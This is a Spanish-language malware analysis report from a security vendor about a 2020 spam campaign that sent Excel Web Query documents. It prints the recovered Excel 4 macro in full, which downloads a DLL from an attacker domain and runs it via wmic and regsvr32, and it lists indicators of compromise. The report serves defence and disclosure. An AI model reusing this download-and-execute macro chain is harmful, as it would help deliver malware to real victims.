Aunque el mal uso de Excel Web Query (IQY) para la propagación de malware no es nada nuevo [1], un caso reciente ha desconcertado no sólo a los investigadores del Security Lab de Hornetsecurity, sino también a otros analistas de seguridad [3][6]. Una campaña de spam de correo electrónico en la que se entregan documentos de Excel malignos en archivos comprimidos. Una vez realizado el análisis en los ordenadores por los expertos en ciberseguridad, la aplicación de la calculadora de Windows se inicia automáticamente. Los analistas suponen que los atacantes pueden estar tratando de desviar la atención de la intención real del documento malicioso que se entregó a las víctimas. En este informe, el Security Lab de Hornetsecurity,  llega al fondo del caso.

El procedimiento

Los documentos maliciosos se distribuyen como archivos adjuntos zip llamados invoice*.xls.zip, siendo la parte * la única variable. El mensaje de correo electrónico adjunto es muy breve, a veces sin y otras con saludo, pero siempre con una referencia al archivo adjunto sin ningún texto adicional:

Email Example Malware Scam

Tan pronto como se abre el documento, aparece un pop up con un falso mensaje de diálogo que dice: «Encontramos un problema con el contenido. ¿Quiere intentar recuperar lo máximo posible?»:

Email Example Office Excel Scam

Luego el documento utiliza Excel Web Query para descargar código de macro adicional desde una ubicación remota. Uno de esos códigos de macros observados descargó y ejecutó un archivo ejecutable (identificado como w32-dll-run-shellcode.dll), que a su vez ejecutó la aplicación de calculadora de Windows calc.exe.

El Security Lab de Hornetsecurity asume que este no era o es el objetivo previsto. Sin embargo, la investigación de la OSINT y la correlación con otras fuentes indican que el único programa recargado era w32-dll-run-shellcode.dll. No se sabe si en algún otro momento se entregó un archivo recargado malicioso en lugar del w32-dll-run-shellcode.dll. Tampoco se sabe si w32-dll-run-shellcode.dll fue/está entregado intencionalmente o por error.

Análisis técnico

El documento

El documento tiene una hoja oculta:

Hidden Sheet Example

En esta tabla oculta en las celdas, el código macro para el pop up engañoso descrito anteriormente puede verse:

Inside Hidden Sheet Malwarescam

Cuando se ejecuta el documento sin Internet, se muestra un error con la URL maliciosa que debería haberse cargado:

Unable to Open URL Malwarescam

Si el documento se ejecuta en Internet emulada y la consulta recibe una respuesta genérica, se informa de un error de consulta en la Web:

Web Query Error MalwareScam

Sabiendo esto, las conexiones de datos de la carpeta pueden ser examinadas para revelar la cadena de conexión de la consulta Web:

Web Query Connection String MalwareScam

Desafortunadamente, el Archivo de Consulta Web de Excel (IQY) no pudo ser cargado y las conexiones HTTP fueron redirigidas a https://www.google.com/ usando un código 301. Es una técnica conocida para negar a los investigadores de seguridad informática el acceso al objetivo. Esto podría basarse en rangos de direcciones IP o en el llamado geofencing, de modo que sólo las redes de víctimas previstas tengan acceso al objetivo verdadero, o la URL sólo podría permitir un cierto número de descargas del objetivo antes de la redirección.

Se sabe por otras fuentes que se devolvió una solicitud de consulta web de Excel:

Source Code MalwareScam
Mientras que los comandos =CLOSE(FALSE) le indican a Excel que cierre la tabla, hemos examinado más a fondo la base URL /lander/excel4_158158672/index.html. Sin embargo, también fue redirigido a https://www.google.com/.
  Finalmente, /lander/excel4 devuelve el siguiente macro de Excel 4:
=CALL(«urlmon»,»URLDownloadToFileA»,»JJCCJJ»,0,»https://merystol.xyz/SDVsdv23r»,»c:\\Users\\Public\\fbafb4234.html»,0,0)
=IF(ALERT(«The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.»,2), WAIT(NOW()+»00:00:01″), )
=EXEC(«wmic process call create «»regsvr32 -s c:\\Users\\Public\\fbafb4234.html»»»)
=CLOSE(FALSE)

Esta macro descarga un archivo de https://merystol.xyz/SDVsdv23r a c:\\\usuario\\publico\\fbafb4234.html via urlmon.URLDownloadToFileA. Entonces regsvr32 a través de la llamada de proceso wmic creada para registrar sigilosamente (-s switch) el DLL descargado.

Y aquí es donde el caso se vuelve extraño: mientras que la anterior URL https://merystol.xyz/SDVsdv23r fue redirigida a https://www.google.com/ durante nuestro análisis, en VirusTotal se puede ver que en un momento dado la URL cargó un archivo con el hash 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb lud [2].

MalwareScam VirusTotal Screenshot

El w32-dll-run-shellcode.dll es muy simple, no contiene importaciones y apenas tiene una secuencia de caracteres:

$ strings 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb.bin
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.reloc
RhcalcTYRQd
WinEu
w32-dll-run-shellcode.dll
_DllMain@12

El Githubtribution a través de la cadena w32-dll-run-shellcode.dll conduce a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/build_config.py (un clon del proyecto original en https://code.google.com/archive/p/win-exec-calc-shellcode/). El código en cuestión es idéntico a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/w32-exec-calc-shellcode.asm. Es un viejo código PoC de un agresivo investigador de seguridad que ejecuta calc.exe.

La descarga de este w32-dll-run-shellcode.dll también fue observada por otros investigadores [3].

El mismo w32-dll-run-shellcode.dll también estaba disponible en https://brinchik.xyz/Qz8ZNnxg [4]. Un esquema de nombres de dominio y URL que coincide con el malware observado aquí. La misma URL se redirige a una URL descargando Ursnif. Esto fue previamente verificado por otro investigador [5]. Esto significa que es probable que la ejecución de calc.exe sea un movimiento calculado por los atacantes para distraer del análisis el objetivo real. No se puede determinar en este momento si esta campaña está relacionada con Ursnif y quién está detrás de ella.

Entrega

 

 

Los correos electrónicos se envían desde cuentas de correo real aol.com (89%) y wp.pl (11%). Por lo tanto, los correos electrónicos de aol.com también pasan la validación de la DMARC. No pudimos observar ninguna reutilización de las direcciones de correo electrónico, es decir, la entrega se programó definitivamente para asegurar que se utilizara un único correo electrónico del remitente para cada envío. Sin embargo, los hackers no se dirigieron a ningún sector o industria específica.

Los correos electrónicos fueron entregados el 14.02.2020, 19.02.2020, 20.02.2020 y 21.02.2020:

Email Delivery History

Los nombres de los remitentes siguen el patrón firstname.lastname[0-9a-z]{0,5}@(aol.com|wp.pl).

El bajo volumen de correo electrónico también podría indicar que se trata de una primera prueba o demostración de un nuevo tipo de documento malicioso que utiliza consultas web de Excel.

Conclusión y recomendaciones

 

Esta campaña utiliza macros de Excel 4 y consultas web de Excel para ejecutar y desplegar un malware de segunda fase, aún desconocido. Esto probablemente permite eludir algunos mecanismos de defensa que sólo buscan macros VBA. Todavía se desconoce exactamente qué carga útil se entrega y si la entrega del malware de la 2ª etapa, que simplemente abre la aplicación informática, está diseñada como una solución de análisis o como un error. Sin embargo, el tiempo empleado en el envío del correo electrónico y las redirecciones a Google a través de la URL del objetivo indica que se trata de un desvío calculado.

    Los usuarios pueden protegerse de este tipo de documentos maliciosos de la siguiente manera:
  • Desactivando macros y contenido remoto en Office.
  • No habilitando la funcionalidad de edición o de macro, aunque lo indique un documento.
Hornetsecurity ya está bloqueando este tipo de campaña maliciosa y el Security Lab sigue vigilando la situación.

Indicadores de Compromiso (IOCs)

Hashes
SHA256Description
018902c1bbfe41581710c5efad2a2c9f516bd7aa98dc8432584520623e7eb2bcDocument
6dcc25eb214c38bc942ffdbe8680a1dec867ac4780aac7262391298d561b5928Document
822054123910494bbb80cc4e46f79f045cc527dc12d89bda4b8b58bd9be417f7Document
dc778302fefac2735c112311736e2050eef7a2b84b1e1569b0456e8349d0715cDocument
e1bf01178976efeedcd277f83bebc02f8f4d687d7348d906950a0a524f3f1a98Document

DNSs

  • doolised.xyz
  • emmnebuc.xyz
  • merystol.xyz
  • veqejzkb.xyz

MITRE ATT&CK técnicas

 

TácticaIDNombreDescripción
Acceso InicialT1193Spearphishing AttachmentManda email para obtener acceso inicial.
EjecuciónT1204User ExecutionLa víctima ejecuta la carga.
EjecuciónT1047Windows Management InstrumentationWMI se usó para ejecutar la carga de la segunda etapa de la carga útil.
Defensa EvasiónT1117Regsvr32Ejecución del proxy de la carga útil de la segunda etapa.